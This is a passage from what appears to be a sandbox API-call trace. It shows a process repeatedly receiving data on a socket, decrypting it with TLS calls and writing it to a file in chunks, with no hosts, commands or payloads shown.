buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2542 [0073.058] recv (in: s=0x51c, buf=0x265066f, len=1586, flags=0 | out: buf=0x265066f*) returned 1586 [0073.065] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1054, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1054, pfQOP=0x0) returned 0x0 [0073.065] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.065] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.065] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2789 [0073.065] recv (in: s=0x51c, buf=0x2650766, len=1339, flags=0 | out: buf=0x2650766*) returned 1339 [0073.109] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1168, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1168, pfQOP=0x0) returned 0x0 [0073.109] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.109] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.110] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1576 [0073.110] recv (in: s=0x51c, buf=0x26502a9, len=2552, flags=0 | out: buf=0x26502a9*) returned 2552 [0073.185] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e127c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e127c, pfQOP=0x0) returned 0x0 [0073.185] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.185] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.186] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.186] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1390, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1390, pfQOP=0x0) returned 0x0 [0073.186] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.186] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.186] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2070 [0073.186] recv (in: s=0x51c, buf=0x2650497, len=2058, flags=0 | out: buf=0x2650497*) returned 2058 [0073.189] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e14a4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e14a4, pfQOP=0x0) returned 0x0 [0073.189] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.190] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.190] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3777 [0073.190] recv (in: s=0x51c, buf=0x2650b42, len=351, flags=0 | out: buf=0x2650b42*) returned 351 [0073.254] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e15b8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e15b8, pfQOP=0x0) returned 0x0 [0073.254] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.254] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.254] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2564 [0073.254] recv (in: s=0x51c, buf=0x2650685, len=1564, flags=0 | out: buf=0x2650685*) returned 1564 [0073.309] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e16cc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e16cc, pfQOP=0x0) returned 0x0 [0073.310] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.310] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.310] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.310] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e17e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e17e0, pfQOP=0x0) returned 0x0 [0073.310] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.310] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.310] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3058 [0073.311] recv (in: s=0x51c, buf=0x2650873, len=1070, flags=0 | out: buf=0x2650873*) returned 1070 [0073.313] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e18f4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e18f4, pfQOP=0x0) returned 0x0 [0073.314] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.314] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.314] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 4765 [0073.314] recv (in: s=0x51c, buf=0x2650f1e, len=7555, flags=0 | out: buf=0x2650f1e*) returned 7555 [0073.433] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1a08, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1a08, pfQOP=0x0) returned 0x0 [0073.433] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0073.434] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.434] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.434] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1b1c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1b1c, pfQOP=0x0) returned 0x0 [0073.434] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.434] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.434] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2907 [0073.435] recv (in: s=0x51c, buf=0x26507dc, len=1221, flags=0 | out: buf=0x26507dc*) returned 1221 [0073.438] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1c30, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1c30, pfQOP=0x0) returned 0x0 [0073.439] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.439] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.439] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.439] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1d44, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1d44, pfQOP=0x0) returned 0x0 [0073.439] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.439] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.439] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 481 [0073.440] recv (in: s=0x51c, buf=0x264fe62, len=3647, flags=0 | out: buf=0x264fe62*) returned 3647 [0073.557] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1e58, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1e58, pfQOP=0x0) returned 0x0 [0073.557] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.557] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.557] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.557] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e1f6c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e1f6c, pfQOP=0x0) returned 0x0 [0073.558] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.558] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.558] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.558] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2080, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2080, pfQOP=0x0) returned 0x0 [0073.558] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.559] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.559] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2682 [0073.559] recv (in: s=0x51c, buf=0x26506fb, len=1446, flags=0 | out: buf=0x26506fb*) returned 1446 [0073.562] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2194, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2194, pfQOP=0x0) returned 0x0 [0073.562] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.562] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.562] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0073.562] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e22a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e22a8, pfQOP=0x0) returned 0x0 [0073.562] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0073.563] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0073.563] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 256 [0073.563] recv (in: s=0x51c, buf=0x264fd81, len=3872, flags=0 | out: buf=0x264fd81*) returned 3872 [0074.107] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e23bc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e23bc, pfQOP=0x0) returned 0x0 [0074.107] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.107] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.107] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.107] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e24d0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e24d0, pfQOP=0x0) returned 0x0 [0074.107] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.108] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.110] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.110] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e25e4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e25e4, pfQOP=0x0) returned 0x0 [0074.111] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.111] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.111] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.111] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e26f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e26f8, pfQOP=0x0) returned 0x0 [0074.111] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.111] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.112] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 5624 [0074.112] recv (in: s=0x51c, buf=0x2651279, len=6696, flags=0 | out: buf=0x2651279*) returned 6696 [0074.194] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e280c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e280c, pfQOP=0x0) returned 0x0 [0074.194] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0074.194] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.194] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.194] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2920, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2920, pfQOP=0x0) returned 0x0 [0074.194] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.195] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.195] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.195] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2a34, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2a34, pfQOP=0x0) returned 0x0 [0074.195] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.195] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.195] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.195] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2b48, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2b48, pfQOP=0x0) returned 0x0 [0074.195] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.195] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.196] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1340 [0074.196] recv (in: s=0x51c, buf=0x26501bd, len=2788, flags=0 | out: buf=0x26501bd*) returned 2788 [0074.325] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2c5c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2c5c, pfQOP=0x0) returned 0x0 [0074.325] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.325] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.325] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.325] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2d70, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2d70, pfQOP=0x0) returned 0x0 [0074.325] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.326] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.326] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.326] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2e84, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2e84, pfQOP=0x0) returned 0x0 [0074.326] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.326] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.326] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.326] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e2f98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e2f98, pfQOP=0x0) returned 0x0 [0074.326] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.327] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.327] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.327] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e30ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e30ac, pfQOP=0x0) returned 0x0 [0074.327] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.327] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.327] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 2575 [0074.327] recv (in: s=0x51c, buf=0x2650690, len=1553, flags=0 | out: buf=0x2650690*) returned 1553 [0074.451] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e31c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e31c0, pfQOP=0x0) returned 0x0 [0074.451] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.451] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.451] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.451] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e32d4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e32d4, pfQOP=0x0) returned 0x0 [0074.451] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.452] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.452] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.452] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e33e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e33e8, pfQOP=0x0) returned 0x0 [0074.452] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.452] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.452] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.452] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e34fc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e34fc, pfQOP=0x0) returned 0x0 [0074.452] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.452] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.453] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.453] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3610, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3610, pfQOP=0x0) returned 0x0 [0074.453] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.453] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.453] recv (in: s=0x51c, buf=0x264fc81, len=12320, flags=0 | out: buf=0x264fc81*) returned 2350 [0074.453] recv (in: s=0x51c, buf=0x26505af, len=9970, flags=0 | out: buf=0x26505af*) returned 9970 [0074.581] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3724, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3724, pfQOP=0x0) returned 0x0 [0074.581] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x3000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x3000, lpOverlapped=0x0) returned 1 [0074.581] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.581] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.581] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e3838, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e3838, pfQOP=0x0) returned 0x0 [0074.581] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26c95e8*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0074.581] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0074.581] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0074.582] DecryptMessage (in: phContext=0x267177c, pMessage=0x26e394c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26e394c, pfQOP=0x0) returned 0x0 [0074.582] WriteFile (in: hFile=0x518, lpBuffer=0x26c95e8*, nNumberOfBytesToWrite=0x1000, 